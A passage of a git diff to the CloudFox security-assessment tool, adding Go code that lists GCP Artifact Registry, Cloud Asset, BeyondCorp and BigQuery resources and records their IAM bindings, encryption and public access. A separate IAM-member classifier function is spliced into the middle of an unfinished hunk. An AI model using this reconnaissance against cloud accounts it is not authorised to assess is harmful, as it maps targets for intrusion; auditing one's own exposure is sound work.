Digest: digest, } } @@ -192,17 +332,38 @@ func (ars *ArtifactRegistryService) DockerImages(repositoryName string) ([]Artif // Parse image name to extract detailed information. details := parseDockerImageName(image.Name) - // Populate the ArtifactInfo structure with Docker image details. 
- artifacts = append(artifacts, ArtifactInfo{ + // Build version from tags or digest + version := details.Digest + if len(image.Tags) > 0 { + version = image.Tags[0] // Use first tag as version + } + + artifact := ArtifactInfo{ Name: details.ImageName, Format: "DOCKER", Location: details.Location, Repository: details.Repository, SizeBytes: fmt.Sprintf("%d", image.ImageSizeBytes), - Updated: image.UpdateTime.AsTime().String(), Digest: details.Digest, ProjectID: details.ProjectID, - }) + Tags: image.Tags, + MediaType: image.MediaType, + URI: image.Uri, + Version: version, + } + + // Parse timestamps + if image.UpdateTime != nil { + artifact.Updated = image.UpdateTime.AsTime().Format(time.RFC3339) + } + if image.UploadTime != nil { + artifact.Uploaded = image.UploadTime.AsTime().Format(time.RFC3339) + } + if image.BuildTime != nil { + artifact.BuildTime = image.BuildTime.AsTime().Format(time.RFC3339) + } + + artifacts = append(artifacts, artifact) } return artifacts, nil @@ -227,10 +388,80 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string break } if err != nil { - return nil, fmt.Errorf("failed to list locations: %w", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } locations = append(locations, loc.LocationId) } return locations, nil } + +// ContainerRegistryRepositories enumerates legacy Container Registry (gcr.io) repositories +// Container Registry stores images in Cloud Storage buckets, so we check for those buckets +func (ars *ArtifactRegistryService) ContainerRegistryRepositories(projectID string) []RepositoryInfo { + var repositories []RepositoryInfo + + // Container Registry uses specific bucket naming conventions: + // - gcr.io -> artifacts.{project-id}.appspot.com (us multi-region) + // - us.gcr.io -> us.artifacts.{project-id}.appspot.com + // - eu.gcr.io -> eu.artifacts.{project-id}.appspot.com + // - asia.gcr.io -> asia.artifacts.{project-id}.appspot.com + + gcrLocations := []struct { 
// GetMemberType classifies a GCP IAM member string (e.g. "user:alice@example.com")
// into a coarse principal category such as "User", "ServiceAccount", or "PUBLIC".
// Unrecognized prefixes return "Unknown".
func GetMemberType(member string) string {
	switch {
	case member == "allUsers":
		return "PUBLIC"
	case member == "allAuthenticatedUsers":
		return "ALL_AUTHENTICATED"
	case strings.HasPrefix(member, "user:"):
		return "User"
	case strings.HasPrefix(member, "serviceAccount:"):
		return "ServiceAccount"
	case strings.HasPrefix(member, "group:"):
		return "Group"
	case strings.HasPrefix(member, "domain:"):
		return "Domain"
	case strings.HasPrefix(member, "projectOwner:"):
		return "ProjectOwner"
	case strings.HasPrefix(member, "projectEditor:"):
		return "ProjectEditor"
	case strings.HasPrefix(member, "projectViewer:"):
		return "ProjectViewer"
	case strings.HasPrefix(member, "deleted:"):
		return "Deleted"
	default:
		return "Unknown"
	}
}
"cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -15,27 +16,58 @@ type CombinedRepoArtifactInfo struct { Artifacts []ArtifactInfo `json:"artifacts"` } +// IAMBinding represents a single IAM binding on a repository +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // ArtifactInfo represents the basic information of an artifact within a registry. type ArtifactInfo struct { - Name string `json:"name"` - Format string `json:"format"` - Version string `json:"version"` - Location string `json:"location"` - Repository string `json:"repository"` - SizeBytes string `json:"virtualSize"` - Updated string `json:"updated"` - Digest string `json:"digest"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + Format string `json:"format"` + Version string `json:"version"` + Location string `json:"location"` + Repository string `json:"repository"` + SizeBytes string `json:"virtualSize"` + Updated string `json:"updated"` + Uploaded string `json:"uploaded"` + BuildTime string `json:"buildTime"` + Digest string `json:"digest"` + ProjectID string `json:"projectID"` + Tags []string `json:"tags"` + MediaType string `json:"mediaType"` + URI string `json:"uri"` } // RepositoryInfo holds information about a repository and its artifacts. 
type RepositoryInfo struct { + // Basic info Name string `json:"name"` Format string `json:"format"` Description string `json:"description"` SizeBytes string `json:"sizeBytes"` ProjectID string `json:"projectID"` Location string `json:"location"` + + // Security-relevant fields + Mode string `json:"mode"` // STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, REMOTE_REPOSITORY + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + CleanupPolicies int `json:"cleanupPolicies"` // Number of cleanup policies + Labels map[string]string `json:"labels"` + + // Timestamps + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // Registry type (for differentiating AR vs GCR) + RegistryType string `json:"registryType"` // "artifact-registry" or "container-registry" } // DockerImageDetails holds the extracted parts from a Docker image name. 
@@ -54,6 +86,7 @@ type ArtifactRegistryClientWrapper struct { LocationLister func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] RepositoryGetter func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) DockerImageLister func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] + RawClient interface{} // Store raw client for IAM operations } func (w *ArtifactRegistryClientWrapper) ListRepositories(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { @@ -74,5 +107,6 @@ func (w *ArtifactRegistryClientWrapper) ListDockerImages(ctx context.Context, re // ArtifactRegistryService provides methods to interact with Artifact Registry resources. type ArtifactRegistryService struct { - Client *ArtifactRegistryClientWrapper + Client *ArtifactRegistryClientWrapper + Session *gcpinternal.SafeSession } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go new file mode 100644 index 00000000..f56441f0 --- /dev/null +++ b/gcp/services/assetService/assetService.go @@ -0,0 +1,333 @@ +package assetservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + asset "cloud.google.com/go/asset/apiv1" + assetpb "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +type AssetService struct { + session *gcpinternal.SafeSession +} + +func New() *AssetService { + return &AssetService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AssetService { + return &AssetService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string 
`json:"members"` +} + +// AssetInfo represents a Cloud Asset +type AssetInfo struct { + Name string `json:"name"` + AssetType string `json:"assetType"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Labels map[string]string `json:"labels"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy details + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings []IAMBinding `json:"iamBindings"` + IAMBindingCount int `json:"iamBindingCount"` + PublicAccess bool `json:"publicAccess"` +} + +// AssetTypeCount tracks count of assets by type +type AssetTypeCount struct { + AssetType string `json:"assetType"` + Count int `json:"count"` +} + +// Common asset types for filtering +var CommonAssetTypes = []string{ + "compute.googleapis.com/Instance", + "compute.googleapis.com/Disk", + "compute.googleapis.com/Firewall", + "compute.googleapis.com/Network", + "compute.googleapis.com/Subnetwork", + "storage.googleapis.com/Bucket", + "iam.googleapis.com/ServiceAccount", + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + "cloudfunctions.googleapis.com/Function", + "run.googleapis.com/Service", + "container.googleapis.com/Cluster", + "sqladmin.googleapis.com/Instance", + "pubsub.googleapis.com/Topic", + "pubsub.googleapis.com/Subscription", + "bigquery.googleapis.com/Dataset", + "bigquery.googleapis.com/Table", +} + +// ListAssets retrieves assets for a project, optionally filtered by type +func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, 
gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAsset(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// ListAssetsWithIAM retrieves assets with their IAM policies +func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_IAM_POLICY, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAssetWithIAM(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// GetAssetTypeCounts returns a summary of asset counts by type +func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil 
{ + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + counts := make(map[string]int) + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + counts[assetResult.AssetType]++ + } + + var result []AssetTypeCount + for assetType, count := range counts { + result = append(result, AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + + return result, nil +} + +// SearchAllResources searches for resources across the organization or project +func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + req := &assetpb.SearchAllResourcesRequest{ + Scope: scope, + Query: query, + } + + it := client.SearchAllResources(ctx, req) + for { + resource, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := AssetInfo{ + Name: resource.Name, + AssetType: resource.AssetType, + ProjectID: resource.Project, + Location: resource.Location, + DisplayName: resource.DisplayName, + Description: resource.Description, + Labels: resource.Labels, + State: resource.State, + CreateTime: 
resource.CreateTime.String(), + UpdateTime: resource.UpdateTime.String(), + } + + assets = append(assets, info) + } + + return assets, nil +} + +func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.Resource != nil { + info.Location = assetResult.Resource.Location + } + + return info +} + +func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.IamPolicy != nil { + info.HasIAMPolicy = true + info.IAMBindingCount = len(assetResult.IamPolicy.Bindings) + + // Store actual bindings and check for public access + for _, binding := range assetResult.IamPolicy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + info.IAMBindings = append(info.IAMBindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + return info +} + +func extractAssetName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ExtractAssetTypeShort returns a shortened version of the asset type +func ExtractAssetTypeShort(assetType string) string { + parts := strings.Split(assetType, "/") + if len(parts) == 2 { + return parts[1] + } + return assetType +} diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go new file mode 100644 index 00000000..c1255654 --- /dev/null +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -0,0 +1,234 @@ +package beyondcorpservice + +import ( + "context" + 
"fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + beyondcorp "google.golang.org/api/beyondcorp/v1" +) + +type BeyondCorpService struct { + session *gcpinternal.SafeSession +} + +func New() *BeyondCorpService { + return &BeyondCorpService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { + return &BeyondCorpService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AppConnectorInfo represents a BeyondCorp app connector +type AppConnectorInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// AppConnectionInfo represents a BeyondCorp app connection +type AppConnectionInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// ListAppConnectors retrieves all BeyondCorp app connectors +func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session 
!= nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connectors []AppConnectorInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnectors.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { + for _, connector := range page.AppConnectors { + info := s.parseAppConnector(connector, projectID) + + // Get IAM policy for this connector + iamPolicy, iamErr := service.Projects.Locations.AppConnectors.GetIamPolicy(connector.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connectors = append(connectors, info) + } + return nil + }) + if err != nil { + return connectors, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connectors, nil +} + +// ListAppConnections retrieves all BeyondCorp app connections +func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { + ctx := context.Background() + var service *beyondcorp.Service + var err error + + if s.session != nil { + service, err = beyondcorp.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = beyondcorp.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connections []AppConnectionInfo + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := 
service.Projects.Locations.AppConnections.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { + for _, conn := range page.AppConnections { + info := s.parseAppConnection(conn, projectID) + + // Get IAM policy for this connection + iamPolicy, iamErr := service.Projects.Locations.AppConnections.GetIamPolicy(conn.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connections = append(connections, info) + } + return nil + }) + if err != nil { + return connections, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connections, nil +} + +func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { + info := AppConnectorInfo{ + Name: extractName(connector.Name), + FullName: connector.Name, + ProjectID: projectID, + Location: extractLocation(connector.Name), + DisplayName: connector.DisplayName, + State: connector.State, + CreateTime: connector.CreateTime, + UpdateTime: connector.UpdateTime, + } + + if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { + info.PrincipalInfo = connector.PrincipalInfo.ServiceAccount.Email + } + + if connector.ResourceInfo != nil { + info.ResourceInfo = connector.ResourceInfo.Id + } + + return info +} + +func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { + info := AppConnectionInfo{ + Name: extractName(conn.Name), + FullName: conn.Name, + ProjectID: projectID, + 
Location: extractLocation(conn.Name), + DisplayName: conn.DisplayName, + State: conn.State, + Type: conn.Type, + CreateTime: conn.CreateTime, + UpdateTime: conn.UpdateTime, + } + + if conn.ApplicationEndpoint != nil { + info.ApplicationEndpoint = fmt.Sprintf("%s:%d", conn.ApplicationEndpoint.Host, conn.ApplicationEndpoint.Port) + } + + for _, connector := range conn.Connectors { + info.Connectors = append(info.Connectors, extractName(connector)) + } + + if conn.Gateway != nil { + info.Gateway = extractName(conn.Gateway.AppGateway) + } + + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractLocation(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 426cb03f..8b2db6d8 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -2,33 +2,101 @@ package bigqueryservice import ( "context" + "fmt" + "strings" "time" "cloud.google.com/go/bigquery" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/iterator" + bqapi "google.golang.org/api/bigquery/v2" ) -// BigqueryDataset represents a dataset in BigQuery +// AccessEntry represents an access control entry on a dataset +type AccessEntry struct { + Role string `json:"role"` // OWNER, WRITER, READER + EntityType string `json:"entityType"` // User, Group, Domain, ServiceAccount, etc. 
+ Entity string `json:"entity"` // The actual entity identifier +} + +// BigqueryDataset represents a dataset in BigQuery with security-relevant fields type BigqueryDataset struct { - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - Description string - Name string - ProjectID string + // Basic info + DatasetID string `json:"datasetID"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + + // Security-relevant fields + DefaultTableExpiration time.Duration `json:"defaultTableExpiration"` + DefaultPartitionExpiration time.Duration `json:"defaultPartitionExpiration"` + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + Labels map[string]string `json:"labels"` + StorageBillingModel string `json:"storageBillingModel"` + MaxTimeTravel time.Duration `json:"maxTimeTravel"` + + // Access control (IAM-like) + AccessEntries []AccessEntry `json:"accessEntries"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" } -// BigqueryTable represents a table in BigQuery +// BigqueryTable represents a table in BigQuery with security-relevant fields type BigqueryTable struct { - TableID string - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - NumBytes int64 - Description string - ProjectID string + // Basic info + TableID string `json:"tableID"` + DatasetID string `json:"datasetID"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + Description string `json:"description"` + TableType string 
`json:"tableType"` // TABLE, VIEW, MATERIALIZED_VIEW, EXTERNAL, SNAPSHOT + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + ExpirationTime time.Time `json:"expirationTime"` + + // Size info + NumBytes int64 `json:"numBytes"` + NumLongTermBytes int64 `json:"numLongTermBytes"` + NumRows uint64 `json:"numRows"` + + // Security-relevant fields + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` + Labels map[string]string `json:"labels"` + RequirePartitionFilter bool `json:"requirePartitionFilter"` + + // Partitioning info + IsPartitioned bool `json:"isPartitioned"` + PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" + + // View info + IsView bool `json:"isView"` + ViewQuery string `json:"viewQuery"` + UseLegacySQL bool `json:"useLegacySQL"` + + // Streaming info + HasStreamingBuffer bool `json:"hasStreamingBuffer"` + + // IAM bindings (table-level) + IAMBindings []TableIAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` + PublicAccess string `json:"publicAccess"` +} + +// TableIAMBinding represents an IAM binding on a table +type TableIAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -38,14 +106,19 @@ type CombinedBigqueryData struct { } type BigQueryService struct { - // Placeholder for any required services or configuration + session *gcpinternal.SafeSession } -// New creates a new instance of BigQueryService +// New creates a new instance of BigQueryService (legacy - uses ADC directly) func New() *BigQueryService { return &BigQueryService{} } +// NewWithSession creates a BigQueryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { + return &BigQueryService{session: session} +} + // gcloud alpha bq datasets 
list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -78,9 +151,16 @@ func (bq *BigQueryService) BigqueryDatasetsAndTables(projectID string) (Combined // BigqueryDatasets retrieves datasets from the given projectID across all locations func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -92,34 +172,160 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := ds.Metadata(ctx) if err != nil { - return nil, err - } - datasets = append(datasets, BigqueryDataset{ - DatasetID: ds.DatasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - Description: meta.Description, - Name: meta.Name, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + dataset := BigqueryDataset{ + DatasetID: ds.DatasetID, + Name: meta.Name, + Description: meta.Description, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + DefaultTableExpiration: meta.DefaultTableExpiration, + DefaultPartitionExpiration: meta.DefaultPartitionExpiration, + Labels: meta.Labels, + StorageBillingModel: meta.StorageBillingModel, + MaxTimeTravel: meta.MaxTimeTravel, + } + + // Parse encryption + if 
meta.DefaultEncryptionConfig != nil && meta.DefaultEncryptionConfig.KMSKeyName != "" { + dataset.EncryptionType = "CMEK" + dataset.KMSKeyName = meta.DefaultEncryptionConfig.KMSKeyName + } else { + dataset.EncryptionType = "Google-managed" + } + + // Parse access entries + accessEntries, isPublic, publicAccess := parseDatasetAccess(meta.Access) + dataset.AccessEntries = accessEntries + dataset.IsPublic = isPublic + dataset.PublicAccess = publicAccess + + datasets = append(datasets, dataset) } return datasets, nil } +// parseDatasetAccess converts BigQuery access entries to our format and checks for public access +func parseDatasetAccess(access []*bigquery.AccessEntry) ([]AccessEntry, bool, string) { + var entries []AccessEntry + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + for _, a := range access { + if a == nil { + continue + } + + entry := AccessEntry{ + Role: string(a.Role), + EntityType: entityTypeToString(a.EntityType), + Entity: a.Entity, + } + + // Check for special access (views, routines, datasets) + if a.View != nil { + entry.EntityType = "View" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.View.ProjectID, a.View.DatasetID, a.View.TableID) + } + if a.Routine != nil { + entry.EntityType = "Routine" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.Routine.ProjectID, a.Routine.DatasetID, a.Routine.RoutineID) + } + if a.Dataset != nil { + entry.EntityType = "Dataset" + entry.Entity = fmt.Sprintf("%s.%s", a.Dataset.Dataset.ProjectID, a.Dataset.Dataset.DatasetID) + } + + // Check for public access + if a.EntityType == bigquery.SpecialGroupEntity { + if a.Entity == "allUsers" || strings.Contains(strings.ToLower(a.Entity), "allusers") { + hasAllUsers = true + isPublic = true + } + if a.Entity == "allAuthenticatedUsers" || strings.Contains(strings.ToLower(a.Entity), "allauthenticatedusers") { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + + entries = append(entries, entry) + } + + // Determine public access level + 
publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return entries, isPublic, publicAccess +} + +// entityTypeToString converts BigQuery EntityType to a readable string +func entityTypeToString(et bigquery.EntityType) string { + switch et { + case bigquery.DomainEntity: + return "Domain" + case bigquery.GroupEmailEntity: + return "Group" + case bigquery.UserEmailEntity: + return "User" + case bigquery.SpecialGroupEntity: + return "SpecialGroup" + case bigquery.ViewEntity: + return "View" + case bigquery.IAMMemberEntity: + return "IAMMember" + case bigquery.RoutineEntity: + return "Routine" + case bigquery.DatasetEntity: + return "Dataset" + default: + return "Unknown" + } +} + // BigqueryTables retrieves tables from the given projectID and dataset across all locations func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([]BigqueryTable, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() + // Create API service for IAM calls + var apiService *bqapi.Service + if bq.session != nil { + apiService, err = bqapi.NewService(ctx, bq.session.GetClientOption()) + } else { + apiService, err = bqapi.NewService(ctx) + } + if err != nil { + // Continue without IAM if service creation fails + apiService = nil + } + var tables []BigqueryTable ds := client.Dataset(datasetID) it := ds.Tables(ctx) @@ -129,22 +335,173 @@ func (bq *BigQueryService) BigqueryTables(projectID 
